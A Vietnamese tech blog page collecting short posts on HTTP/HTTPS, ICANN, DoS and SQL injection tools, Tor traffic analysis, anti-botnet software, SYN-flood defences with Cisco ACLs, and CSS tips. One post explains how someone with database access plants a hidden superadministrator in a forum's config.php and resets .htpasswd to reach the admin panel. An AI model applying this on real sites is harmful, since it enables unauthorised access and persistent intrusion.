P/s : Backup File php.in trước.

HTTP Là Gì? HTTPS Là Gì? Sự Khác Nhau Giữa HTTP Và HTTPS

1. HTTP là gì?

HTTP là chữ viết tắt từ HyperText Transfer Protocol (giao thức truyền tải siêu văn bản). Nó là giao thức cơ bản mà World Wide Web sử dụng. HTTP xác định cách các thông điệp (các file văn bản, hình ảnh đồ hoạ, âm thanh, video, và các file multimedia khác) được định dạng và truyền tải ra sao, và những hành động nào mà các Web server (máy chủ Web) và các trình duyệt Web (browser) phải làm để đáp ứng các lệnh rất đa dạng. Chẳng hạn, khi bạn gõ một địa chỉ Web URL vào trình duyệt Web, một lệnh HTTP sẽ được gửi tới Web server để ra lệnh và hướng dẫn nó tìm đúng trang Web được yêu cầu và kéo về mở trên trình duyệt Web. Nói nôm na hơn, HTTP là giao thức truyền tải các file từ một Web server vào một trình duyệt Web để người dùng có thể xem một trang Web đang hiện diện trên Internet.HTTP là một giao thức ứng dụng của bộ giao thức TCP/IP (các giao thức nền tảng cho Internet).

2. HTTPS là gì?

HTTPS( Secure HTTP), là một sự kết hợp giữa giao thức HTTP và giao thức bảo mật SSL hay TLS cho phép trao đổi thông tin một cách bảo mật trên Internet. Các kết nối HTTPS thường được sử dụng cho các giao dịch thanh toán trên World Wide Web và cho các giao dịch nhạy cảm trong các hệ thống thông tin công ty. HTTPS được sử dụng trong nhiều tình huống, chẳng hạn như các trang đăng nhập cho ngân hàng, các hình thức, ích đăng nhập công ty, và các ứng dụng khác, trong đó dữ liệu cần phải được an toàn.HTTPS không nên nhầm lẫn với Secure HTTP (S-HTTP) quy định trong RFC 2660.

Sự khác nhau giữa HTTP và HTTPS?

Theo 2 định nghĩa ở trên từ đó ta có thể thấy nếu trang web có địa chỉ bắt đầu bằng http:// thì nó có nghĩa rằng trang web không an toàn. Nói cách khác, một người nào đó có thể nghe lén những gì bạn trao đổi với trang web và có thể lấy những dữ kiện bạn gửi đi từ máy của bạn đến trang web như tên tuổi, căn cước, địa chỉ, số thẻ tín dụng, v..v…Do đó bạn không nên điền số thẻ tín dụng trên trang nhà nêú địa chỉ của nó bắt đầu bằng http.Nhưng nếu địa chỉ của trang web bắt đầu bằng chữ https:// thì điều này có nghĩa là bạn đang liên lạc an toàn với server của trang web và người ta không thể nghe lén và trôm những thông tin bạn gửi đi.Chắc bây giờ bạn đã hiểu mức quan trọng của chữ S trong https:// lớn như thế nào. Do đó, khi trang web bảo bạn điền những tin tức riêng của bạn vào những khung điền thông tin trên trang web, nhất là những thông tin quan trọng như số thẻ tín dụng,hay số an sinh xã hội, ngày sinh tháng đẻ, số passport, các passwords v…v…, thì trước tiên bạn phải nhìn vào địa chỉ để xem nó có chữ S sau http hay không tức là địa chỉ trang web có bắt đầu bằng https:// hay không. Nếu không, bạn không nên trao đổi những thông tin nhậy cảm đó với trang web.

ICANN Là Gì?



ICANN là nơi quản lý tất cả các domain quốc tế để xem thông tin chi tiết vui lòng vào: ICANN.ORG.

Cơ quan Internet quản lý số liệu và tên miền được chuyển nhượng (Tiếng Anh: Internet Corporation for Assigned Names and Numbers (ICANN)) là một tổ chức phi lợi nhuận đặt trụ sở tại Marina del Rey, California, United States. ICANN được thành lập ngày 18 tháng 9 năm 1998 và hợp nhập vào ngày 30 tháng 9 năm 1998 để giám xác một số nhiệm vụ liên quan tới Internet mà trước đây được thực hiện trực tiếp bởi các tổ chức khác trên danh nghĩa của chính phủ Mỹ, mà đáng chú ý trong số đó là IANA ICANN chịu trách nhiệm trong việc quản lý không gian địa chỉ IP (IPv4 và IPv6) và việc phân phối các khối địa chỉ tới các cơ quan đăng ký Internet khu vực. Duy trì các cơ quan đăng ký tên định danh IP; Quản lý không gian tên miền cấp cao nhất (miền DNS gốc), bao gồm việc điều hành của những máy phục vụ tên gốc. Phần lớn các công việc của ICANN liên quan tới việc giới thiệu của những miền cấp cao mới (top-level domains (TLDs)). Công việc kĩ thuật của ICANN giống như chức năng của IANA. Những nguyên tắc cơ bản hàng đầu trong việc điều hành của ICANN được mô tả như việc giúp đỡ duy trì sự hoạt động ổn định của Internet; thúc đẩy việc cạnh tranh; đạt được sự đại diện rộng rãi của cộng đồng Internet toàn cầu và xây dựng chính sách phù hợp với nhiệm vụ của ICANN thông qua các quá trình từ dưới lên, dựa trên sự nhất trí ý kiến. Vào ngày 29 tháng 9 năm 2006, ICANN đã ký một thỏa thuận với Bộ Thương Mại Hoa Kỳ về việc đưa tổ chức tư nhân vào sự quản lý toàn diện của hệ thống các tên định danh được điều phối tập trung của Internet thông qua mô hình nhiều phía cùng có lợi trong việc trao đổi ý kiến mà ICANN đại diện.

SlowHTTPTest – Phần Mềm Mô Phỏng Tấn Công Ddos



SlowHTTPTest là một công cụ cấu hình nâng cao, mô phỏng một cuộc tấn công từ chối dịch vụ. Nó hoạt động trên hầu hết các nền tảng Linux, OSX và Cygwin và một môi trường giống Unix, giao diện command-line cho Microsoft Windows.

Nó thực hiện các cuộc tấn công tại tầng ứng dụng và tấn công vào băng thông thấp phổ biến như các cuộc tấn công slowloris, Slow HTTP POST, Slow Read (dựa trên giao thức TCP với thời gian khai thác kéo dài), cũng như tấn công Apache Range Header bằng cách gây quá tải bộ nhớ và CPU trên máy chủ.

Slowloris và Slow HTTP POST DoS tấn công dựa trên các giao thức HTTP vốn thiết kế đòi hỏi các request phải hoàn toàn được nhận bởi máy chủ trước khi được thực thi. Nếu một request HTTP không đầy đủ hoặc nếu tốc độ truyền tải thấp, máy chủ phải giữ nguồn tài nguyên đó ở chế độ busy và chờ đợi phần còn lại của dữ liệu. Nếu máy chủ giữ quá nhiều tài nguyền busy sẽ gây ra từ chối dịch vụ và không thể đáp ứng các yêu cầu khác. Công cụ này gửi các request HTTP không đầy đủ và cố gắng thực hiện một cuộc tấn công từ chối dịch vụ để kiểm tra khả năng chịu tải của máy chủ HTTP.


Có thể xác định danh tính của hơn 81% người dùng Tor



Mạng ẩn danh Tor nổi tiếng là có khả năng giấu kín được danh tính cũng như vị trí truy cập của người dùng. Nó luôn là một mục tiêu khó khăn của cơ quan thực thi pháp luật trong nhiều năm và FBI đã phải chi hàng triệu đô la để xác định danh tính của người sử dụng Tor nhưng chưa thành công. Tuy nhiên, trong một nghiên cứu gần đây cho thấy, có thể xác định danh tính của hơn 81% người dùng Tor thông qua phần mềm phân tích lưu lượng truy cập có tên Netflow mà Cisco đã xây dựng vào giao thức định tuyến của họ.

NetFlow là một giao thức mạng được thiết kế để thu thập và theo dõi lưu lượng mạng. Nó trao đổi dữ liệu trong dòng mạng, có thể tương ứng với các kết nối TCP hoặc các gói tin IP chia sẻ đặc điểm chung, các gói tin UDP chia sẻ nguồn và địa chỉ IP, số cổng và các thông tin khác.

Nghiên cứu được tiến hành trong sáu năm của giáo sư Sambuddho Chakravarty, một nhà nghiên cứu về mạng ẩn danh và bảo mật tại Viện Indraprastha về Công nghệ thông tin ở Delhi. Chakravarty sử dụng một kỹ thuật nhằm xác định các “rơle” Tor có liên quan đến một máy chủ Tor đã được cải tiến chạy Linux mà khách hàng mục tiêu truy cập, sau đó sửa đổi nút Tor đó mà có thể hình thành một mạch hop với các nút tùy ý.

Theo các nhà nghiên cứu, máy chủ điều chỉnh các dữ liệu trước khi được gửi lại cho khách hàng, trong khi các nút corrupt Tor được sử dụng để trì hoãn việc đo lường giữa chính nó và các Tor nodes khác. Trong báo cáo, các nhà nghiên cứu cũng cho biết, để thực hiện các cuộc tấn công phân tích lưu lượng truy cập quy mô lớn trong môi trường Tor, không nhất thiết phải cần đến các nguồn lực của cả một quốc gia. Thậm chí, một AS (Autonomous System) duy nhất cũng có thể theo dõi hơn 39% các mạch Tor được tạo ra ngẫu nhiên.

Kỹ thuật này phụ thuộc vào việc tiêm nhiễm một mô hình lưu lượng lặp đi lặp lại đến các kết nối TCP mà nó quan sát từ exit node của mục tiêu. Sau đó tính lưu lượng đầu ra của máy chủ, từ thông tin lưu lại của router để xác định người dùng Tor.

Do được thiết kế như một mạng ẩn danh có độ trễ thấp, Tor dễ bị tổn thương với loại phân tích lưu lượng truy cập này.

THN

8 công cụ miễn phí bảo vệ máy tính của bạn khỏi Botnet



Trong bài viết này, mình xin giới thiệu với các bạn 8 công cụ miễn phí giúp tìm và loại bỏ Botnet nếu như bạn bị nhiễm. Đây là các công cụ, phần mềm miễn phí từ Microsoft và các công ty bảo mật nổi tiếng khác.

Botnet là mạng lưới các máy tính bị điều khiển bởi những kẻ tấn công từ xa để thực hiện nhiệm vụ bất hợp pháp như gửi thư rắc hoặc tấn công các máy tính, trang web khác.
Malicious Software Removal Tool

Malicious Software Removal Tool là một công cụ giúp loại bỏ các phần mềm độc hại bao gồm cả Bot. Microsoft phát hành một phiên bản cập nhật của công cụ này vào ngày Thứ Ba thứ hai mỗi tháng khi cần thiết để ứng phó sự cố an ninh. Các phiên bản mới của công cụ này được cung cấp bởi Windows Update chạy nền và sau đó báo cáo nếu có mối nguy hiểm được tìm thấy. Nhưng bạn cũng có thể tải về và sử dụng nó bất cứ khi nào bạn cần.
Phrozensoft Mirage Anti-Bot



Phrozensoft Mirage Anti-Bot sẽ tự động cập nhật tập tin hosts trên máy tính của bạn, sử dụng dữ liệu được cung cấp bởi trang web antimalware nổi tiếng www.abuse.ch. Bằng cách thêm các trang web trong danh sách bị chặn, bot sẽ không thể gửi truy vấn về máy chủ.
Trend Micro RUBotted

RUBotted theo dõi các nguy cơ lây nhiễm trên máy tính của bạn và các hoạt động đáng ngờ liên quan đến bot. Khi phát hiện một nguy cơ lây nhiễm, RUBotted sẽ nhận diện và ngăn chặn nó với HouseCall.
Norton Power Eraser



Norton Power Eraser loại bỏ mã độc được nhúng và các phần mềm độc hại khó gỡ bỏ mà các trình diệt virus thông thường không phải lúc nào cũng nhận diện được.
BotHunter

BotHunter là một công cụ chẩn đoán Botnet cho Windows, Unix, Linux và Mac OS giúp tương quan hai chiều thông tin liên lạc giữa các máy tính có lỗ hổng và tin tặc.
Avira BotFrei

BotFrei từ Avira là một công cụ miễn phí sẽ phát hiện và loại bỏ sự lây nhiễm bot từ hệ thống của bạn.
Kaspersky DE-Cleaner



DE-Cleaner được cung cấp bởi Kaspersky và cũng được gọi là Kaspersky Anti-Botnet. Bạn có thể tải nó về từ Chip.de. Chú ý giao diện hiện tại có ngôn ngữ là tiếng Đức.
Bot Revolt


Bot Revolt hoạt động ngầm trong kết nối mạng và giám sát mọi thứ đi qua nó. Nó liên tục theo dõi tất cả thông tin gửi tới máy tính của bạn. Phần mềm quét tự động mỗi 0,002 giây để tìm kiếm bất kỳ thông tin đáng ngờ hoặc trái phép, và ngăn chặn cuộc tấn công từ tin tặc hoặc các cuộc tấn công botnet tới máy tính của bạn. Tải về

The Mole – Công cụ tự động khai thác lỗ hổng SQL Injection


The Mole là một công cụ tự động khai thác SQL Injection. Chỉ cần cung cấp một URL và một chuỗi giá trị có hiệu lực trên trang web, The Mole có thể phát hiện lỗ hổng và khai thác các lỗ hổng đó hoặc sử dụng kết hợp với các kỹ thuật khác hay kĩ thuật truy vấn theo kiểu boolean.

TÍNH NĂNG NỔI BẬT
  1. Hỗ trợ hệ quản trị cơ sở dữ liệu MySQL, SQL Server, Postgres và Oracle.
  2. Giao diện command line. Các dòng lệnh khác nhau thực hiện chức năng khác nhau.
  3. Tự động hoàn thành lệnh, đối số và cơ sở dữ liệu, tên bảng và tên cột.
  4. Hỗ trợ bộ lọc để vượt qua quy tắc thông thường của IPS/IDS và tạo ra quy tắc mới dễ dàng kết hợp hơn.
  5. Khai thác SQL Injections thông qua các tham số GET/POST/Cookie.
  6. Được phát triển trên python 3.x.
  7. Sử dụng đơn giản.

Bạn có thể xem thêm hướng dẫn sử dụng và cài đặt trên trang chủ của The Mole


SecurityDaily

Nguyên Tắc Cơ Bản Của TCP Syn Flood

Kiểu tấn công TCP SYN flood là một kiểu tấn công trực tiếp vào máy chủ bằng cách tạo ra một số lượng lớn các kết nối TCP nhưng không hoàn thành các kết nối này.
Phía kẻ tấn công sẽ khởi tạo nhiều TCP, trong mỗi kết nối chỉ để cờ TCP SYN. Máy chủ sẽ gửi lại trả lời vớI TCP SYN và ACK. Nhưng sau đó máy tấn công đơn giản là không trả lời thông điệp thứ ba như mong đợi của server theo tiến trình bắt tay ba chiều. Server lúc này sẽ tốn bộ nhớ và tài nguyên trong khi chờ các phiên TCP timeouts hoặc trước khi các kết nối đang thiết lập dang dở được dọn dẹp. Máy server lúc này có thể từ chối các kết nối TCP khác và các thiết bị cân bằng tải trong các server farm lúc này có thể chia tải không cân bằng. Các firewall có hỗ trợ cơ chế stateful có thể ngăn ngừa kiểu tấn công TCP SYN attack này.

Một cách để ngăn ngừa kiểu tấn công SYN attack là đơn giản loại bỏ các gói TCP header trong đó chỉ có cờ SYN được thiết lập. Nói cách khác, loại bỏ tất cả các gói tin đầu tiên trong một kết nối TCP mới. Trong nhiều trường hợp, một router không nên cho phép các kết nối TCP được thiết lập bởi client. Trong trường hợp này, việc lọc các TCP segment ban đầu giúp ngăn ngừa SYN attack.

Công cụ Cisco IOS ACLs không thể match trực tiếp cờ TCP SYN trong một gói tin. Tuy nhiên một ACL có thể dùng từ khóa establised để tìm ra những tcp segment có cờ ACK được thiết lập. Từ khóa established có thể match tất cả các TCP segment ngoại trừ TCP segment đầu tiên trong một kết nối mới. Cấu hình dưới đây sẽ dùng trên R1 để từ chối những yêu cầu kết nối mới từ Internet đi vào mạng bên trong ASN1.

Dòng ACE đầu tiên sẽ lựa ra các phân đoạn TCP không phảI là segment đầu tiên và cho phép các segment này. Dòng ACE thứ hai sẽ lựa ra tất cả các TCP segment, nhưng vì tất các các segment không phảilà đầu tiên đã dính vớI dòng đầu tiên, dòng thứ hai này sẽ chỉ so trùng vớI các segment đầu tiên.

ip access-list extended prevent-synpermit tcp any 1.0.0.0 0.255.255.255 establisheddeny tcp any 1.0.0.0 0.255.255.255permit (whatever)!interface s0/0ip access-group prevent-syn in

ACL hoạt động tốt khi client nằm bên ngoài mạng không được phép tạo kết nối TCP vào mạng bên trong. Tuy nhiên trong những trường hợp các kết nối TCP vào bên trong là được phép, ACL này không thể được dùng.

Một đặc điểm khác của CiscoIOS được gọi là TCP intercept cho phép các kết nối TCP đi vào mạng nhưng giám sát các kết nối này để chống kiểu tấn công TCP SYN. TCP Intercept hoạt động trong hai chế độ. Trong chế độ watch, nó theo dõi thông tin trạng thái của kết nốI TCP match với một ACL. Nếu kết nối TCP không hoàn bắt tay hai chiều trong một khoảng thời gian, TCP intercepts sẽ gửi một thông điệp TCP reset đến máy server, dọn dẹp kết nối. Nó cũng sẽ đến số kết nối mới trong một khoảng thời gian và nếu có một số lớn kết nối trong một giây (“lớn” có giá trị mặc định là 1100), router sẽ tạm thời lọc các yêu cầu thiết lập TCP mới.

Trong chế độ intercept, router sẽ trả lời đến các yêu cầu thiết lập TCP thay vì chuyển các yêu cầu này về server. Sau đó, nếu quá trình bắt tay 3 lần hoàn thành, router sẽ tạo ra một kết nối giữa nó và server. Ở thời điểm này, router đã nối chặt hai kết nối với nhau. Chế độ này làm tốn nhiều tải nhưng bảo vệ tốt hơn cho server.

Các lệnh dưới đây sẽ bật cơ chế TCP intercept cho những gói tin so trùng với ACL match-tcp-from-internet. Ngoài ra, chế độ được thiết lập là chế độ watch, còn chế độ mặc định là intercept. Cuối cùng, lệnh watch timeout đã được đưa về chế độ mặc định là 30 giây. Nếu kết nối TCP vẫn trong tình trạng không hoàn tất, cơ chế TCP intercept sẽ khởi động kết nối.

ip tcp intercept-list match-tcp-from-internetip tcp intercept mode watchip tcp intercept watch-timeout 20

ACL sẽ lựa ra tất cả các gói tin gửi đến địa chỉ 1.0.0.0/8 và dùng TCP. ACL này sẽ tham chiếu đến các lệnh ip tcp intercept-list ở trên.

ip access-list extended match-tcp-from-internetpermit tcp any 1.0.0.0 0.255.255.255

Chú ý rằng ACL không được áp dụng vào bất kỳ cổng nào.

interface s0/0
!

Login Vào Admin Cp Khi Bị Giới Hạn Quyền Truy Cập

Thông thường khi hack web, việc có shell trên server là điều mà các hacker luôn mong muốn. Bởi khi có shell chúng ta sẽ có được thông tin về database...--> có được tài khoản Admin hoặc tạo thêm được tài khoản Admin quản trị website.

Ta sẽ không đề cập đến vấn đề chiếm quyền Admin hiện tại, mà ở đây, với 1 database chúng ta có thể tạo thêm user trong database, gán id group cho user đó nằm trong administrator group, mặc định của group này có id là 6.

Tuy nhiên, khi đã trong nhóm Administrator rồi nhưng chúng ta không thể đăng nhập được vào Admin CP, do đó cần phải thêm id của user đó vào file config. Mặc định file config.php được đặt tại
/includes/config.phpChúng ta cần sửa 3 thông số :
$config['SpecialUsers']['superadministrators'] = '1';$config['SpecialUsers']['canviewadminlog'] = '1';$config['SpecialUsers']['canpruneadminlog'] = '1';

Bạn hãy tạo thêm 1 nik name với id khác vd như abc với id là 123 chẳng hạn. Sau đó thêm vào :

$config['SpecialUsers']['superadministrators'] = '1,123';$config['SpecialUsers']['canviewadminlog'] = '1,123';$config['SpecialUsers']['canpruneadminlog'] = '1,123';

Khi đó, bạn sẽ login được vào AdminCP. Nếu trường hợp Admincp bị đặt htaccess thì chúng ta đổi password trong file .htpasswd.

Thứ Năm, 20 tháng 11, 2014

Đổi tên Page Facebook trên 200 Like

Đổi tên Page Facebook trên 200 Like
Đổi tên Page Facebook trên 200 Like
Facebook chỉ chấp nhận đổi tên cho Page khi đang có dưới 200 người thích. Trong bài viết này, mình sẽ hướng dẫn các bạn đổi tên cho Page có trên 200 lượt thích.

ĐỌC TIẾP »

Cắt ảnh cho Album Facebook cực kì đơn giản với Image Splitter

Image Splitter
Cắt ảnh với Image Splitter

Thủ thuật xếp nhiều ảnh nhỏ thành một ảnh lớn trong mục Album trên Facebook đã có từ lâu. Với những bạn nào biết chút ít về Photoshop thì việc cắt ảnh thành nhiều phần không quá khó. Tuy nhiên cũng có nhiều bạn gặp rắc rối trong vấn đề này.

Hôm nay mình xin giới thiệu với các bạn một phần mềm nhỏ của tác giả wakillon tên là Image Splitter. Phần mềm này có tác dụng chia nhỏ một hình ảnh thành nhiều phần với số cột và số hàng do ta chỉ định.

ĐỌC TIẾP »

Thứ Tư, 19 tháng 11, 2014

Tùy chỉnh thanh cuộn cho IE, Chrome và Firefox bằng CSS

Sử dụng Tùy chỉnh Thanh cuộn trong trang web của bạn có thể rất bắt mắt và tạo sự ấn tượng về thiết kế của trang web bạn. Đối với người thiết kế web, việc sử dụng JavaScript để tùy chỉnh là rất phức tạp. Thay vào đó, bạn có thể dễ dàng tùy chỉnh Thanh cuộn với CSS. Trước đây có thể việc sử dụng CSS chỉ có thể làm việc trên trình duyệt Internet Explorer. Nhưng gần đây, CSS có thể làm việc hầu hết trên mọi trình duyệt. Và sau đây là một số hướng dẫn tùy chỉnh trên các trình duyệt thông dụng.

Tùy chỉnh trên trình duyệt Internet Explorer

Code:
http://bitbin.it/qoHwLdkJ

Giải thích:


Tùy chỉnh trên trình duyệt Chrome
Code:
http://bitbin.it/loDTpszU

Giải thích:


Với trình duyệt Chrome và Webkit, bạn có thể dễ dàng tùy chỉnh Thanh cuộn hơn trên trình duyệt IE, không chỉ thay đổi màu sắc, bạn có thể áp dụng các thuộc tính radius, transparency trên thanh cuộn.

Tùy chỉnh trên trình duyệt Firefox

Code:
http://bitbin.it/m1LUS6tb